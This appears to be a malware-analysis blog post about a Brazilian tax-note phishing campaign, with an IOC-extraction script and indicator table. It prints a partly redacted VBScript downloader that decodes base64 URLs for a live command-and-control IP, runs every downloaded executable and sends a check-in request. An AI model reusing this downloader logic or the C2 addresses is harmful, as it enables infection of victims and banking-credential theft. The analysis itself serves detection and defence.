The other day I decided to take a walkabout in our data and explore what the rest of the world sees. It didn't take long to find a poorly constructed Brazilian tax note phish spoofing the country's Ministry of Economy. The actor fumbled the phish template: the lure switches between an invoice phish and a tax note phish.

As you have probably guessed, that link does not go to the Ministry of Economy, nor is it an electronic tax note. Instead it downloads a ZIP file containing a VBScript. The script is minimally obfuscated (random-looking variable names and two base64-encoded strings) and rather simple, so I will only provide a stripped-down version; the infection-marker check and the download routine are elided and replaced with placeholder names.
' Resolve %APPDATA% and build the working folder %APPDATA%\realteknv
Set objShellSW = CreateObject( "WScript.Shell" )
noqrtvvwyyABBDEEGIJ =objShellSW.ExpandEnvironmentStrings("%APPDATA%")
Set wshShell = CreateObject("WScript.Shell")
BBDEGIIJLNNOQQRTTV = noqrtvvwyyABBDEEGIJ +"\realteknv"
' (elided) infection marker: quit if the folder already exists
Exit_if_BBDEGIIJLNNOQQRTTV_exists
' Decoy error dialog shown to the victim
msgbox " FILE NOT FOUND " ,vbInformation,"Windows"
Dim oFSO
Set oFSO = CreateObject("Scripting.FileSystemObject")
oFSO.CreateFolder BBDEGIIJLNNOQQRTTV
' Base64-encoded URLs: (1) hxxp://3.81.170[.]195/grl/ and (2) the payload ZIP
Zbccgghjjlmmoqrrtu = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9ncmwv")
uuwyzBBDEGGHJJLMO = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9iYzUyNzllOC0zNGFjLTRkMTYtYThmMi1iOWJkOTA0NDhhMC56aXA")
' Local path the ZIP is written to
NPQQUUVXXZaacdffhi = BBDEGIIJLNNOQQRTTV & "\tvvwyABBDEGGIJJL.zip"
' (elided) HTTP download of the ZIP URL (2) to NPQQUUVXXZaacdffhi
download_payload
' Extract the ZIP with the Shell.Application COM object; CopyHere flag 4 = no progress dialog
ZipFile = BBDEGIIJLNNOQQRTTV & "\tvvwyABBDEGGIJJL.zip"
ExtractTo = BBDEGIIJLNNOQQRTTV & "./"
Set fso = CreateObject("Scripting.FileSystemObject")
sourceFile = fso.GetAbsolutePathName(ZipFile)
destFolder = fso.GetAbsolutePathName(ExtractTo)
Set objShell = CreateObject("Shell.Application")
Set FilesInZip=objShell.NameSpace(sourceFile).Items()
objShell.NameSpace(destFolder).copyHere FilesInZip, 4
' Remove the archive once extracted
Set objFSOx = Createobject("Scripting.FileSystemObject")
If objFSOx.Fileexists(BBDEGIIJLNNOQQRTTV & "\tvvwyABBDEGGIJJL.zip") Then objFSOx.DeleteFile BBDEGIIJLNNOQQRTTV & "\tvvwyABBDEGGIJJL.zip"
' Run every .exe found in the working folder
Set objFSOw = CreateObject("Scripting.FileSystemObject")
objStartFolder = BBDEGIIJLNNOQQRTTV
Set objFolder = objFSOw.GetFolder(objStartFolder)
Set colFiles = objFolder.Files
Dim objShellLM
Set objShellLM = WScript.CreateObject( "WScript.Shell" )
For Each objFile in colFiles
If UCase(objFSOw.GetExtensionName(objFile.name)) = "EXE" Then
' The extension-stripped name is computed but never used; the file runs under its full name
wyABDFFGIIJLNNOQQST = Replace(objFile.Name,".exe","")
ffgiklnnpqsstvvxy = BBDEGIIJLNNOQQRTTV & "\" & objFile.Name
objShellLM.Exec(ffgiklnnpqsstvvxy)
End If
Next
' Final GET to URL (1) via MSXML2.XMLHTTP
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", Zbccgghjjlmmoqrrtu, False
o.send
The script starts by resolving %APPDATA% and creating a working folder, %APPDATA%\realteknv, which doubles as an infection marker: if the folder already exists, the script exits. It then shows a decoy "FILE NOT FOUND" dialog and base64-decodes the two strings, which yield (1) hxxp://3.81.170[.]195/grl/ and (2) hxxp://3.81.170[.]195/bc5279e8-34ac-4d16-a8f2-b9bd90448a0.zip. Note which variable holds which: the ZIP URL (2) is what the elided download routine fetches into the working folder, while (1) is the URL used in the final GET. After the download it extracts the archive with the Shell.Application COM object (the CopyHere flag 4 suppresses the progress dialog), deletes the ZIP, and loops over the folder executing every .exe it finds through WScript.Shell.Exec. The extension-stripped name is computed but never used, so the payload runs under its original filename. Finally it sends a GET request to (1), most likely a check-in telling the operator that the payload has run.
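As an added example, and not code from the original post, the following Python triage helper automates what the paragraph above does by hand: it pulls the base64_decode("...") arguments out of the script, decodes them even when the padding has been dropped (the second string in the sample has none), keeps only those that decode to a URL, defangs them in the hxxp://x.x.x[.]x style used on this page, identifies which one is fetched by the final GET and which one is the ZIP payload, and recovers the %APPDATA% marker folder. The VBS_SAMPLE excerpt is constructed from the lines quoted above; the function name base64_decode comes from the sample, while the regexes and the result keys are my own assumptions.

```python
"""Triage helper for the VBScript downloader quoted above (added example)."""
import base64
import json
import re
from urllib.parse import urlparse

# Constructed excerpt: the relevant lines from the stripped-down script on the page
VBS_SAMPLE = r'''
noqrtvvwyyABBDEEGIJ =objShellSW.ExpandEnvironmentStrings("%APPDATA%")
BBDEGIIJLNNOQQRTTV = noqrtvvwyyABBDEEGIJ +"\realteknv"
Zbccgghjjlmmoqrrtu = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9ncmwv")
uuwyzBBDEGGHJJLMO = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9iYzUyNzllOC0zNGFjLTRkMTYtYThmMi1iOWJkOTA0NDhhMC56aXA")
o.open "GET", Zbccgghjjlmmoqrrtu, False
'''

# VBScript is case-insensitive, so match case-insensitively too
B64_CALL = re.compile(r'(\w+)\s*=\s*base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)', re.I)
GET_CALL = re.compile(r'\.open\s+"GET"\s*,\s*(\w+)', re.I)
APPDATA_SUBDIR = re.compile(
    r'ExpandEnvironmentStrings\("%APPDATA%"\)[\s\S]*?\+\s*"\\([^"]+)"', re.I)


def b64_decode_lenient(blob: str) -> str:
    """Decode base64 that may lack '=' padding, as the sample's second string does."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def defang(url: str) -> str:
    """hxxp://3.81.170[.]195/path form, so the IOC is not clickable in a report."""
    parsed = urlparse(url)
    host = parsed.hostname or ""
    head, sep, tail = host.rpartition(".")      # bracket only the last dot
    safe_host = f"{head}[.]{tail}" if sep else host
    scheme = parsed.scheme.replace("http", "hxxp", 1)
    rest = url[len(parsed.scheme) + 3 + len(host):]  # port/path/query kept verbatim
    return f"{scheme}://{safe_host}{rest}"


def extract_iocs(vbs: str) -> dict:
    """Return defanged URLs, hosts, payload/beacon URLs and the drop folder."""
    decoded = {name: b64_decode_lenient(blob) for name, blob in B64_CALL.findall(vbs)}
    # Keep only strings that actually decoded to an http(s) URL with a host
    urls = {n: u for n, u in decoded.items()
            if urlparse(u).scheme in ("http", "https") and urlparse(u).hostname}
    beacon = GET_CALL.search(vbs)
    beacon_var = beacon.group(1) if beacon else None
    marker = APPDATA_SUBDIR.search(vbs)
    return {
        "urls": {n: defang(u) for n, u in urls.items()},
        "hosts": sorted({urlparse(u).hostname for u in urls.values()}),
        "payload_url": next((defang(u) for u in urls.values()
                             if u.lower().endswith(".zip")), None),
        "beacon_url": defang(urls[beacon_var]) if beacon_var in urls else None,
        "drop_dir": f"%APPDATA%\\{marker.group(1)}" if marker else None,
    }


if __name__ == "__main__":
    print(json.dumps(extract_iocs(VBS_SAMPLE), indent=2))
```

Run against the sample it reports the /grl/ URL as the beacon (the argument of the final GET) and the .zip URL as the payload, which is the ordering the code, not the variable names, dictates; the drop folder is what you would hunt for on endpoints.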
And what sort of goodness does that payload deliver? Well, it is a Brazilian phish, so you would be correct if you guessed a generic Delphi-based Brazilian banking trojan. Many anti-virus vendors label this family Banload, Boleto, or Delf.
| IOC | Type | Notes |
|---|---|---|
| 3.81.170.195 | IP address | C2 address; hosts the payload ZIP and receives the final GET |
| dcd9ce1d719c4c7f3a06aaf320dd57f20fd9c228f21d56b118b1d28a726eecae | SHA256 | ZIP file |
| 6c1708f6d07e2f947f1e9cf1df24d0ba3d43a87c58c4c066a67072daeb73c61b | SHA256 | VBScript downloader |
| 1085cc04386f819f56f56ce15f63bff09336b44785ab93e7f75c073282c07e6c | SHA256 | Banking trojan (payload EXE) |